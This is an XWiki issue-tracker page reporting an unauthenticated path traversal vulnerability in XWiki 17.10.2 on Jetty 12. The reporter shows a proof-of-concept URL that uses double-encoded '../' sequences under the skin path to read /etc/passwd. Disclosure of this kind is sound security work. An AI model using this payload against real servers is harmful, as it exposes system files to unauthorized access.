Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-24075

Security Vulnerability Report: Path Traversal in XWiki with Jetty 12

    XMLWordPrintable

Details

    • Integration
    • Unknown
    • N/A
    • N/A
    • 8.2

    Description

      Hello XWiki team,

      I found an Unauthenticate  Path Traversal vulnerability in XWIKI platform.

      Please check and register a CVE for me if this bug is valid.

      Enviroment:

      • Xwiki version: 17.10.2
      • Jetty version: 12.1.5

      Step to POC:

      1. Access URL: http://[host]/xwiki/bin/skin/..%252f/..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
      2. Response


       

      Attachments

        Issue Links

          Activity

            People

              tmortagne Thomas Mortagne
              khoaln Lê Ngọc Khoa
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: